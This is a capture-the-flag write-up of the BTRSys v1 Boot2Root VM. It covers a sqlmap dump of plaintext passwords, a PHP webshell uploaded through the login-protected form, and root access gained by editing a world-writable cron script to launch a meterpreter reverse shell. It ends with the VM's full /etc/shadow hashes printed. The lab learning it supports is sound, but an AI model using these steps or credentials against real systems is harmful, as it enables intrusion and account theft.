Wow two in one day! It must be a record… or the fact I am ill, either way here’s another write-up. This time I will be doing Resimler: BTRSys v1, It’s a fairly straight forward Boot2Root and for people familiar to these kinds of challenges follows a fairly standard flow.
So firstly let’s nmap it. We find:
21 ftp vsftpd 3.0.2
22 ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2
80 Apache httpd 2.4.7
The FTP has anonymous access but noting there. ok good my fave, webapp.
loading up the webapp in a browser proxied by burp there is very little, 2 pages neither with dynamic content and not much to play with! also it seems to be foreign, this makes it a bit tougher!
So I fire up nikto which gives:
/config.php – blank page
/login.php
I sqlmap login.php which gives the following:
Database: deneme Table: user [2 entries] +----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+ | ID | Parola | BabaAdi | AnneAdi | Ad_Soyad | AnneMeslegi | BabaMeslegi | KardesSayisi | Kullanici_Adi | +----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+ | 1 | asd123*** | ahmet | nazli | ismail kaya | lokantaci | muhasebe | 5 | ikaya@btrisk.com | | 2 | asd123*** | mahmut | gulsah | can demir | tuhafiyeci | memur | 8 | cdmir@btrisk.com | +----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
It takes a while to work out what is what but eventualy can log in with the email address and the obvious password.
The page presented simply has a upload form. I upload test.txt and it says uploaded fine. So simply guess where it uploaded to which is /uploads/.
In burp I sent that upload request to repeater, dropped in my fave shell (b374k) and changed the name to shell.php. Checked the uploads folder and was greeted with a webshell.
From there I read config.php which contained:
$con=mysqli_connect(“localhost”,”root”,”toor”,”deneme”);
and /etc/passwd which gave some useernames but otherwise wan’t much help.
next as you would expect I uploaded and ran linuxprivescchecker.py which gave the following useful information:
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) )
Ubuntu 14.04.1 LTS
[+] World Writable Files
-rwxrwxrwx 1 root root 34 Aug 13 2014 /var/tmp/cleaner.py.swp
-rwxrwxrwx 1 root root 23 Aug 13 2014 /var/log/cronlog
--w--w--w- 1 root root 0 Oct 5 2017 /sys/fs/cgroup/systemd/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 5 2017 /sys/kernel/security/apparmor/.access
-rwxrwxrwx 1 root root 96 Aug 13 2014 /lib/log/cleaner.py
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Realizing /lib/log/cleaner.py was a cronjob run every 2 mins as root and was editable I did the following:
1) create meterpreter reverse shell.elf
2) upload shell.elf to /tmp
3) set up meterpreter listener on attack box
4) modify /lib/log/cleaner.py to “chown root:root /tmp/shell.elf”
5) modify /lib/log/cleaner.py to “chmod +x /tmp/shell.elf”
6) modify /lib/log/cleaner.py to “/tmp/shell.elf 2>/dev/null &”
I was then greeted to a root shell!
root@BTRsys1:~# whoami && uname -a && pwd whoami && uname -a && pwd root Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux /root root@BTRsys1:~# ls -la ls -la total 36 drwx------ 4 root root 4096 May 2 19:02 . drwxr-xr-x 21 root root 4096 Aug 9 2014 .. -rw------- 1 root root 2634 May 5 22:42 .bash_history drwx------ 2 root root 4096 Apr 28 01:44 .cache -rw------- 1 root root 8 May 5 22:41 .nano_history -rw-r--r-- 1 root root 74 Aug 10 2014 .selected_editor drwx------ 2 root root 4096 Aug 10 2014 .ssh -rw------- 1 root root 5778 May 2 19:02 .viminfo lrwxrwxrwx 1 root root 27 Apr 28 05:27 apache.conf -> /etc/phpmyadmin/apache.conf lrwxrwxrwx 1 root root 19 Apr 28 05:27 conf.d -> /etc/apache2/conf.d lrwxrwxrwx 1 root root 19 Apr 28 05:27 conf.f -> /etc/apache2/conf.f lrwxrwxrwx 1 root root 21 Apr 28 05:07 phpmyadmin -> /usr/share/phpmyadmin lrwxrwxrwx 1 root root 35 Apr 28 05:28 phpmyadmin.conf -> /etc/apache2/conf.d/phpmyadmin.conf
what! no flag?! well I guess the /etc/shadow file will have to count as a flag. I havent been bothered to crack the hashes, feel free to though!
cat /etc/shadow root:$6$AEZ/mND7$ju6KUwv0cZlGEiHjs1EBhO6nlE5zOGU4OwhUl/1n/EE9TI5W76rxS6OO2q7hMvhUL5.IsSL1VKyqBbf6.cCkd1:17284:0:99999:7::: daemon:*:16273:0:99999:7::: bin:*:16273:0:99999:7::: sys:*:16273:0:99999:7::: sync:*:16273:0:99999:7::: games:*:16273:0:99999:7::: man:*:16273:0:99999:7::: lp:*:16273:0:99999:7::: mail:*:16273:0:99999:7::: news:*:16273:0:99999:7::: uucp:*:16273:0:99999:7::: proxy:*:16273:0:99999:7::: www-data:*:16273:0:99999:7::: backup:*:16273:0:99999:7::: list:*:16273:0:99999:7::: irc:*:16273:0:99999:7::: gnats:*:16273:0:99999:7::: nobody:*:16273:0:99999:7::: libuuid:!:16273:0:99999:7::: syslog:*:16273:0:99999:7::: messagebus:*:16291:0:99999:7::: sshd:*:16291:0:99999:7::: ftp:*:16292:0:99999:7::: lololol:!:16292:0:99999:7::: ps-aux:$6$N8fO8B2w$ABHj.O2jTfIizBfrb0SpgN6VJLDujJ6o9wR4D0b4ZqqlfKQzW1M0xG0uTR4AZW77BFH0rsA2ZxnoGSMdwy3k00:16292:0:99999:7::: maleus:$6$Y.Ev9AQx$IS.ikFcKj5.natBbOMMP3GiV9LJDjCQaHuvKoEeA1hPjhss8qLzjVPpuSnKysIF261sSnjOfoFjhpo.rO8qDg.:16292:0:99999:7::: felux:$6$t0WWHdf0$9QYd6dc9XuZo.RwMRCdrzuTPTqaCJ47KAS7p1EitR2LVGJsOqjarTxD67WUhLQvmF3KOFIfgvN3rlw7cfU132.:16292:0:99999:7::: Eagle11:$6$Pz9WUVEk$PPQQs334rlXCZRRY1w/uullgDaKeIMGNlzUXERsCl7zIrdulDtrcYD74t/mtw0yhqsJJQFXrZ08dpk0gEx0gX1:16292:0:99999:7::: genphlux:$6$K2gip8vY$jcbwnoeCKqtu.9IkVbBNDJ3TAV0NcVSWgv2U3uYx1e942dcaD1NhxEpBklKAX1NnnrDCw6SU1Fw7vJ6tmOiCM/:16292:0:99999:7::: usmc8892:$6$MlFBCUvT$YS7ZpyXavI6tGgYJW3fPFRbUlV2yhoHGir26minsRRBTTDf60NIwxi7PP3S8/vePYFBVVuSC0kfyBYeMnHnBO1:16292:0:99999:7::: blawrg:$6$Pg7SOYWy$Ap9wmycvq0n2iR8CJNKcY/SBUrOqC4Dc8D6whHDnZNp8xqLCB/GF2Et4lHnhHehWkgObxSX5MZWofAc4QQSbj1:16292:0:99999:7::: wytshadow:$6$Xw3TqkwY$O2Xx5JXO9DXSyqumRCBWa2fk0Z0glVUNty9nKkms4SlAKMtWwmHvNRHiIClPa4SGvCii0fCi5Xxg6gvoZrXhG0:16292:0:99999:7::: vis1t0r:$6$nVShrZJb$ZAZ9nf4vzddUm1ISPO8gKgYweQopjc/Ta7jbEacYbDVOG1g8Y3LHwiJhU2NsDJljkn2Oc4xPJPeMpox5jSBHd0:16292:0:99999:7::: mysql:!:17284:0:99999:7:::
Thanks ismailonderkaya for a fun Boot2Root, I’m looking forward to starting v2.